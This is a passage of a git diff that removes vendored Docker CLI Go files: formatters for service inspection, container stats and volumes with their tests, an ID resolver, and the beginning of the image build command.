.ResourceLimitMemory }} -{{- end }}{{ end }}{{ end }} -{{- if .Networks }} -Networks: -{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }} -Endpoint Mode: {{ .EndpointMode }} -{{- if .Ports }} -Ports: -{{- range $port := .Ports }} - PublishedPort {{ $port.PublishedPort }} - Protocol = {{ $port.Protocol }} - TargetPort = {{ $port.TargetPort }} -{{- end }} {{ end -}} -` - -// NewServiceFormat returns a Format for rendering using a Context -func NewServiceFormat(source string) Format { - switch source { - case PrettyFormatKey: - return serviceInspectPrettyTemplate - default: - return Format(strings.TrimPrefix(source, RawFormatKey)) - } -} - -// ServiceInspectWrite renders the context for a list of services -func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error { - if ctx.Format != serviceInspectPrettyTemplate { - return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef) - } - render := func(format func(subContext subContext) error) error { - for _, ref := range refs { - serviceI, _, err := getRef(ref) - if err != nil { - return err - } - service, ok := serviceI.(swarm.Service) - if !ok { - return fmt.Errorf("got wrong object to inspect") - } - if err := format(&serviceInspectContext{Service: service}); err != nil { - return err - } - } - return nil - } - return ctx.Write(&serviceInspectContext{}, render) -} - -type serviceInspectContext struct { - swarm.Service - subContext -} - -func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) { - return marshalJSON(ctx) -} - -func (ctx *serviceInspectContext) ID() string { - return ctx.Service.ID -} - -func (ctx *serviceInspectContext) Name() string { - return ctx.Service.Spec.Name -} - -func (ctx *serviceInspectContext) Labels() map[string]string { - return ctx.Service.Spec.Labels -} - -func (ctx *serviceInspectContext) IsModeGlobal() bool { - return ctx.Service.Spec.Mode.Global != nil -} - -func (ctx *serviceInspectContext) IsModeReplicated() bool { - return ctx.Service.Spec.Mode.Replicated != nil -} - -func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 { - return ctx.Service.Spec.Mode.Replicated.Replicas -} - -func (ctx *serviceInspectContext) HasUpdateStatus() bool { - return ctx.Service.UpdateStatus.State != "" -} - -func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState { - return ctx.Service.UpdateStatus.State -} - -func (ctx *serviceInspectContext) UpdateStatusStarted() string { - return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt)) -} - -func (ctx *serviceInspectContext) UpdateIsCompleted() bool { - return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted -} - -func (ctx *serviceInspectContext) UpdateStatusCompleted() string { - return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt)) -} - -func (ctx *serviceInspectContext) UpdateStatusMessage() string { - return ctx.Service.UpdateStatus.Message -} - -func (ctx *serviceInspectContext) TaskPlacementConstraints() []string { - if ctx.Service.Spec.TaskTemplate.Placement != nil { - return ctx.Service.Spec.TaskTemplate.Placement.Constraints - } - return nil -} - -func (ctx *serviceInspectContext) HasUpdateConfig() bool { - return ctx.Service.Spec.UpdateConfig != nil -} - -func (ctx *serviceInspectContext) UpdateParallelism() uint64 { - return ctx.Service.Spec.UpdateConfig.Parallelism -} - -func (ctx *serviceInspectContext) HasUpdateDelay() bool { - return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0 -} - -func (ctx *serviceInspectContext) UpdateDelay() time.Duration { - return ctx.Service.Spec.UpdateConfig.Delay -} - -func (ctx *serviceInspectContext) UpdateOnFailure() string { - return ctx.Service.Spec.UpdateConfig.FailureAction -} - -func (ctx *serviceInspectContext) HasUpdateMonitor() bool { - return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0 -} - -func (ctx *serviceInspectContext) UpdateMonitor() time.Duration { - return ctx.Service.Spec.UpdateConfig.Monitor -} - -func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 { - return ctx.Service.Spec.UpdateConfig.MaxFailureRatio -} - -func (ctx *serviceInspectContext) ContainerImage() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image -} - -func (ctx *serviceInspectContext) ContainerArgs() []string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args -} - -func (ctx *serviceInspectContext) ContainerEnv() []string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env -} - -func (ctx *serviceInspectContext) ContainerWorkDir() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir -} - -func (ctx *serviceInspectContext) ContainerUser() string { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.User -} - -func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount { - return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts -} - -func (ctx *serviceInspectContext) HasResources() bool { - return ctx.Service.Spec.TaskTemplate.Resources != nil -} - -func (ctx *serviceInspectContext) HasResourceReservations() bool { - if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil { - return false - } - return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0 -} - -func (ctx *serviceInspectContext) ResourceReservationNanoCPUs() float64 { - if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 { - return float64(0) - } - return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9 -} - -func (ctx *serviceInspectContext) ResourceReservationMemory() string { - if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 { - return "" - } - return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes)) -} - -func (ctx *serviceInspectContext) HasResourceLimits() bool { - if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil { - return false - } - return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0 -} - -func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 { - return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9 -} - -func (ctx *serviceInspectContext) ResourceLimitMemory() string { - if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 { - return "" - } - return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes)) -} - -func (ctx *serviceInspectContext) Networks() []string { - var out []string - for _, n := range ctx.Service.Spec.Networks { - out = append(out, n.Target) - } - return out -} - -func (ctx *serviceInspectContext) EndpointMode() string { - if ctx.Service.Spec.EndpointSpec == nil { - return "" - } - - return string(ctx.Service.Spec.EndpointSpec.Mode) -} - -func (ctx *serviceInspectContext) Ports() []swarm.PortConfig { - return ctx.Service.Endpoint.Ports -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go deleted file mode 100644 index 7997f996d8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/stats.go +++ /dev/null @@ -1,211 +0,0 @@ -package formatter - -import ( - "fmt" - "sync" - - units "github.com/docker/go-units" -) - -const ( - winOSType = "windows" - defaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}" - winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}" - - containerHeader = "CONTAINER" - cpuPercHeader = "CPU %" - netIOHeader = "NET I/O" - blockIOHeader = "BLOCK I/O" - memPercHeader = "MEM %" // Used only on Linux - winMemUseHeader = "PRIV WORKING SET" // Used only on Windows - memUseHeader = "MEM USAGE / LIMIT" // Used only on Linux - pidsHeader = "PIDS" // Used only on Linux -) - -// StatsEntry represents represents the statistics data collected from a container -type StatsEntry struct { - Container string - Name string - ID string - CPUPercentage float64 - Memory float64 // On Windows this is the private working set - MemoryLimit float64 // Not used on Windows - MemoryPercentage float64 // Not used on Windows - NetworkRx float64 - NetworkTx float64 - BlockRead float64 - BlockWrite float64 - PidsCurrent uint64 // Not used on Windows - IsInvalid bool - OSType string -} - -// ContainerStats represents an entity to store containers statistics synchronously -type ContainerStats struct { - mutex sync.Mutex - StatsEntry - err error -} - -// GetError returns the container statistics error. -// This is used to determine whether the statistics are valid or not -func (cs *ContainerStats) GetError() error { - cs.mutex.Lock() - defer cs.mutex.Unlock() - return cs.err -} - -// SetErrorAndReset zeroes all the container statistics and store the error. -// It is used when receiving time out error during statistics collecting to reduce lock overhead -func (cs *ContainerStats) SetErrorAndReset(err error) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - cs.CPUPercentage = 0 - cs.Memory = 0 - cs.MemoryPercentage = 0 - cs.MemoryLimit = 0 - cs.NetworkRx = 0 - cs.NetworkTx = 0 - cs.BlockRead = 0 - cs.BlockWrite = 0 - cs.PidsCurrent = 0 - cs.err = err - cs.IsInvalid = true -} - -// SetError sets container statistics error -func (cs *ContainerStats) SetError(err error) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - cs.err = err - if err != nil { - cs.IsInvalid = true - } -} - -// SetStatistics set the container statistics -func (cs *ContainerStats) SetStatistics(s StatsEntry) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - s.Container = cs.Container - s.OSType = cs.OSType - cs.StatsEntry = s -} - -// GetStatistics returns container statistics with other meta data such as the container name -func (cs *ContainerStats) GetStatistics() StatsEntry { - cs.mutex.Lock() - defer cs.mutex.Unlock() - return cs.StatsEntry -} - -// NewStatsFormat returns a format for rendering an CStatsContext -func NewStatsFormat(source, osType string) Format { - if source == TableFormatKey { - if osType == winOSType { - return Format(winDefaultStatsTableFormat) - } - return Format(defaultStatsTableFormat) - } - return Format(source) -} - -// NewContainerStats returns a new ContainerStats entity and sets in it the given name -func NewContainerStats(container, osType string) *ContainerStats { - return &ContainerStats{ - StatsEntry: StatsEntry{Container: container, OSType: osType}, - } -} - -// ContainerStatsWrite renders the context for a list of containers statistics -func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error { - render := func(format func(subContext subContext) error) error { - for _, cstats := range containerStats { - containerStatsCtx := &containerStatsContext{ - s: cstats, - } - if err := format(containerStatsCtx); err != nil { - return err - } - } - return nil - } - return ctx.Write(&containerStatsContext{}, render) -} - -type containerStatsContext struct { - HeaderContext - s StatsEntry -} - -func (c *containerStatsContext) Container() string { - c.AddHeader(containerHeader) - return c.s.Container -} - -func (c *containerStatsContext) Name() string { - c.AddHeader(nameHeader) - name := c.s.Name[1:] - return name -} - -func (c *containerStatsContext) ID() string { - c.AddHeader(containerIDHeader) - return c.s.ID -} - -func (c *containerStatsContext) CPUPerc() string { - c.AddHeader(cpuPercHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%.2f%%", c.s.CPUPercentage) -} - -func (c *containerStatsContext) MemUsage() string { - header := memUseHeader - if c.s.OSType == winOSType { - header = winMemUseHeader - } - c.AddHeader(header) - if c.s.IsInvalid { - return fmt.Sprintf("-- / --") - } - if c.s.OSType == winOSType { - return fmt.Sprintf("%s", units.BytesSize(c.s.Memory)) - } - return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit)) -} - -func (c *containerStatsContext) MemPerc() string { - header := memPercHeader - c.AddHeader(header) - if c.s.IsInvalid || c.s.OSType == winOSType { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage) -} - -func (c *containerStatsContext) NetIO() string { - c.AddHeader(netIOHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3)) -} - -func (c *containerStatsContext) BlockIO() string { - c.AddHeader(blockIOHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3)) -} - -func (c *containerStatsContext) PIDs() string { - c.AddHeader(pidsHeader) - if c.s.IsInvalid || c.s.OSType == winOSType { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%d", c.s.PidsCurrent) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go deleted file mode 100644 index d5a17cc70e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go +++ /dev/null @@ -1,228 +0,0 @@ -package formatter - -import ( - "bytes" - "testing" - - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestContainerStatsContext(t *testing.T) { - containerID := stringid.GenerateRandomID() - - var ctx containerStatsContext - tt := []struct { - stats StatsEntry - expValue string - expHeader string - call func() string - }{ - {StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container}, - {StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc}, - {StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc}, - {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO}, - {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO}, - {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO}, - {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO}, - {StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc}, - {StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc}, - {StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc}, - {StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage}, - {StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage}, - {StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage}, - {StatsEntry{PidsCurrent: 10}, "10", pidsHeader, ctx.PIDs}, - {StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs}, - {StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs}, - } - - for _, te := range tt { - ctx = containerStatsContext{s: te.stats} - if v := te.call(); v != te.expValue { - t.Fatalf("Expected %q, got %q", te.expValue, v) - } - - h := ctx.FullHeader() - if h != te.expHeader { - t.Fatalf("Expected %q, got %q", te.expHeader, h) - } - } -} - -func TestContainerStatsContextWrite(t *testing.T) { - tt := []struct { - context Context - expected string - }{ - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - { - Context{Format: "table {{.MemUsage}}"}, - `MEM USAGE / LIMIT -20 B / 20 B --- / -- -`, - }, - { - Context{Format: "{{.Container}} {{.CPUPerc}}"}, - `container1 20.00% -container2 -- -`, - }, - } - - for _, te := range tt { - stats := []StatsEntry{ - { - Container: "container1", - CPUPercentage: 20, - Memory: 20, - MemoryLimit: 20, - MemoryPercentage: 20, - NetworkRx: 20, - NetworkTx: 20, - BlockRead: 20, - BlockWrite: 20, - PidsCurrent: 2, - IsInvalid: false, - OSType: "linux", - }, - { - Container: "container2", - CPUPercentage: 30, - Memory: 30, - MemoryLimit: 30, - MemoryPercentage: 30, - NetworkRx: 30, - NetworkTx: 30, - BlockRead: 30, - BlockWrite: 30, - PidsCurrent: 3, - IsInvalid: true, - OSType: "linux", - }, - } - var out bytes.Buffer - te.context.Output = &out - err := ContainerStatsWrite(te.context, stats) - if err != nil { - assert.Error(t, err, te.expected) - } else { - assert.Equal(t, out.String(), te.expected) - } - } -} - -func TestContainerStatsContextWriteWindows(t *testing.T) { - tt := []struct { - context Context - expected string - }{ - { - Context{Format: "table {{.MemUsage}}"}, - `PRIV WORKING SET -20 B --- / -- -`, - }, - { - Context{Format: "{{.Container}} {{.CPUPerc}}"}, - `container1 20.00% -container2 -- -`, - }, - { - Context{Format: "{{.Container}} {{.MemPerc}} {{.PIDs}}"}, - `container1 -- -- -container2 -- -- -`, - }, - } - - for _, te := range tt { - stats := []StatsEntry{ - { - Container: "container1", - CPUPercentage: 20, - Memory: 20, - MemoryLimit: 20, - MemoryPercentage: 20, - NetworkRx: 20, - NetworkTx: 20, - BlockRead: 20, - BlockWrite: 20, - PidsCurrent: 2, - IsInvalid: false, - OSType: "windows", - }, - { - Container: "container2", - CPUPercentage: 30, - Memory: 30, - MemoryLimit: 30, - MemoryPercentage: 30, - NetworkRx: 30, - NetworkTx: 30, - BlockRead: 30, - BlockWrite: 30, - PidsCurrent: 3, - IsInvalid: true, - OSType: "windows", - }, - } - var out bytes.Buffer - te.context.Output = &out - err := ContainerStatsWrite(te.context, stats) - if err != nil { - assert.Error(t, err, te.expected) - } else { - assert.Equal(t, out.String(), te.expected) - } - } -} - -func TestContainerStatsContextWriteWithNoStats(t *testing.T) { - var out bytes.Buffer - - contexts := []struct { - context Context - expected string - }{ - { - Context{ - Format: "{{.Container}}", - Output: &out, - }, - "", - }, - { - Context{ - Format: "table {{.Container}}", - Output: &out, - }, - "CONTAINER\n", - }, - { - Context{ - Format: "table {{.Container}}\t{{.CPUPerc}}", - Output: &out, - }, - "CONTAINER CPU %\n", - }, - } - - for _, context := range contexts { - ContainerStatsWrite(context.context, []StatsEntry{}) - assert.Equal(t, context.expected, out.String()) - // Clean buffer - out.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go deleted file mode 100644 index 90c9b13536..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/volume.go +++ /dev/null @@ -1,121 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - units "github.com/docker/go-units" -) - -const ( - defaultVolumeQuietFormat = "{{.Name}}" - defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}" - - volumeNameHeader = "VOLUME NAME" - mountpointHeader = "MOUNTPOINT" - linksHeader = "LINKS" - // Status header ? -) - -// NewVolumeFormat returns a format for use with a volume Context -func NewVolumeFormat(source string, quiet bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultVolumeQuietFormat - } - return defaultVolumeTableFormat - case RawFormatKey: - if quiet { - return `name: {{.Name}}` - } - return `name: {{.Name}}\ndriver: {{.Driver}}\n` - } - return Format(source) -} - -// VolumeWrite writes formatted volumes using the Context -func VolumeWrite(ctx Context, volumes []*types.Volume) error { - render := func(format func(subContext subContext) error) error { - for _, volume := range volumes { - if err := format(&volumeContext{v: *volume}); err != nil { - return err - } - } - return nil - } - return ctx.Write(&volumeContext{}, render) -} - -type volumeContext struct { - HeaderContext - v types.Volume -} - -func (c *volumeContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *volumeContext) Name() string { - c.AddHeader(volumeNameHeader) - return c.v.Name -} - -func (c *volumeContext) Driver() string { - c.AddHeader(driverHeader) - return c.v.Driver -} - -func (c *volumeContext) Scope() string { - c.AddHeader(scopeHeader) - return c.v.Scope -} - -func (c *volumeContext) Mountpoint() string { - c.AddHeader(mountpointHeader) - return c.v.Mountpoint -} - -func (c *volumeContext) Labels() string { - c.AddHeader(labelsHeader) - if c.v.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.v.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *volumeContext) Label(name string) string { - - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", "_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.v.Labels == nil { - return "" - } - return c.v.Labels[name] -} - -func (c *volumeContext) Links() string { - c.AddHeader(linksHeader) - if c.v.UsageData == nil { - return "N/A" - } - return fmt.Sprintf("%d", c.v.UsageData.RefCount) -} - -func (c *volumeContext) Size() string { - c.AddHeader(sizeHeader) - if c.v.UsageData == nil { - return "N/A" - } - return units.HumanSize(float64(c.v.UsageData.Size)) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go deleted file mode 100644 index 9ec18b6916..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go +++ /dev/null @@ -1,189 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestVolumeContext(t *testing.T) { - volumeName := stringid.GenerateRandomID() - - var ctx volumeContext - cases := []struct { - volumeCtx volumeContext - expValue string - expHeader string - call func() string - }{ - {volumeContext{ - v: types.Volume{Name: volumeName}, - }, volumeName, volumeNameHeader, ctx.Name}, - {volumeContext{ - v: types.Volume{Driver: "driver_name"}, - }, "driver_name", driverHeader, ctx.Driver}, - {volumeContext{ - v: types.Volume{Scope: "local"}, - }, "local", scopeHeader, ctx.Scope}, - {volumeContext{ - v: types.Volume{Mountpoint: "mountpoint"}, - }, "mountpoint", mountpointHeader, ctx.Mountpoint}, - {volumeContext{ - v: types.Volume{}, - }, "", labelsHeader, ctx.Labels}, - {volumeContext{ - v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, - }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, - } - - for _, c := range cases { - ctx = c.volumeCtx - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestVolumeContextWrite(t *testing.T) { - cases := []struct { - context Context - expected string - }{ - - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table format - { - Context{Format: NewVolumeFormat("table", false)}, - `DRIVER VOLUME NAME -foo foobar_baz -bar foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table", true)}, - `foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table {{.Name}}", false)}, - `VOLUME NAME -foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table {{.Name}}", true)}, - `VOLUME NAME -foobar_baz -foobar_bar -`, - }, - // Raw Format - { - Context{Format: NewVolumeFormat("raw", false)}, - `name: foobar_baz -driver: foo - -name: foobar_bar -driver: bar - -`, - }, - { - Context{Format: NewVolumeFormat("raw", true)}, - `name: foobar_baz -name: foobar_bar -`, - }, - // Custom Format - { - Context{Format: NewVolumeFormat("{{.Name}}", false)}, - `foobar_baz -foobar_bar -`, - }, - } - - for _, testcase := range cases { - volumes := []*types.Volume{ - {Name: "foobar_baz", Driver: "foo"}, - {Name: "foobar_bar", Driver: "bar"}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := VolumeWrite(testcase.context, volumes) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestVolumeContextWriteJSON(t *testing.T) { - volumes := []*types.Volume{ - {Driver: "foo", Name: "foobar_baz"}, - {Driver: "bar", Name: "foobar_bar"}, - } - expectedJSONs := []map[string]interface{}{ - {"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"}, - {"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"}, - } - out := bytes.NewBufferString("") - err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestVolumeContextWriteJSONField(t *testing.T) { - volumes := []*types.Volume{ - {Driver: "foo", Name: "foobar_baz"}, - {Driver: "bar", Name: "foobar_bar"}, - } - out := bytes.NewBufferString("") - err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, volumes[i].Name) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go deleted file mode 100644 index 511b1a8f54..0000000000 --- a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go +++ /dev/null @@ -1,90 +0,0 @@ -package idresolver - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "github.com/docker/docker/pkg/stringid" -) - -// IDResolver provides ID to Name resolution. -type IDResolver struct { - client client.APIClient - noResolve bool - cache map[string]string -} - -// New creates a new IDResolver. -func New(client client.APIClient, noResolve bool) *IDResolver { - return &IDResolver{ - client: client, - noResolve: noResolve, - cache: make(map[string]string), - } -} - -func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) { - switch t := t.(type) { - case swarm.Node: - node, _, err := r.client.NodeInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - if node.Spec.Annotations.Name != "" { - return node.Spec.Annotations.Name, nil - } - if node.Description.Hostname != "" { - return node.Description.Hostname, nil - } - return id, nil - case swarm.Service: - service, _, err := r.client.ServiceInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - return service.Spec.Annotations.Name, nil - case swarm.Task: - // If the caller passes the full task there's no need to do a lookup. - if t.ID == "" { - var err error - - t, _, err = r.client.TaskInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - } - taskID := stringid.TruncateID(t.ID) - if t.ServiceID == "" { - return taskID, nil - } - service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID) - if err != nil { - return "", err - } - return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil - default: - return "", fmt.Errorf("unsupported type") - } - -} - -// Resolve will attempt to resolve an ID to a Name by querying the manager. -// Results are stored into a cache. -// If the `-n` flag is used in the command-line, resolution is disabled. -func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) { - if r.noResolve { - return id, nil - } - if name, ok := r.cache[id]; ok { - return name, nil - } - name, err := r.get(ctx, t, id) - if err != nil { - return "", err - } - r.cache[id] = name - return name, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go deleted file mode 100644 index 0c88af5fcd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/build.go +++ /dev/null @@ -1,477 +0,0 @@ -package image - -import ( - "archive/tar" - "bufio" - "bytes" - "fmt" - "io" - "os" - "path/filepath" - "regexp" - "runtime" - - "golang.org/x/net/context" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerignore" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/fileutils" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/pkg/streamformatter" - "github.com/docker/docker/pkg/urlutil" - "github.com/docker/docker/reference" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type buildOptions struct { - context string - dockerfileName string - tags opts.ListOpts - labels opts.ListOpts - buildArgs opts.ListOpts - ulimits *runconfigopts.UlimitOpt - memory string - memorySwap string - shmSize string - cpuShares int64 - cpuPeriod int64 - cpuQuota int64 - cpuSetCpus string - cpuSetMems string - cgroupParent string - isolation string - quiet bool - noCache bool - rm bool - forceRm bool - pull bool - cacheFrom []string - compress bool - securityOpt []string - networkMode string - squash bool -} - -// NewBuildCommand creates a new `docker build` command -func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command { - ulimits := make(map[string]*units.Ulimit) - options := buildOptions{ - tags: opts.NewListOpts(validateTag), - buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv), - ulimits: runconfigopts.NewUlimitOpt(&ulimits), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "build [OPTIONS] PATH | URL | -", - Short: "Build an image from a Dockerfile", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - options.context = args[0] - return runBuild(dockerCli, options) - }, - } - - flags := cmd.Flags() - - flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format") - flags.Var(&options.buildArgs, "build-arg", "Set build-time variables") - flags.Var(options.ulimits, "ulimit", "Ulimit options") - 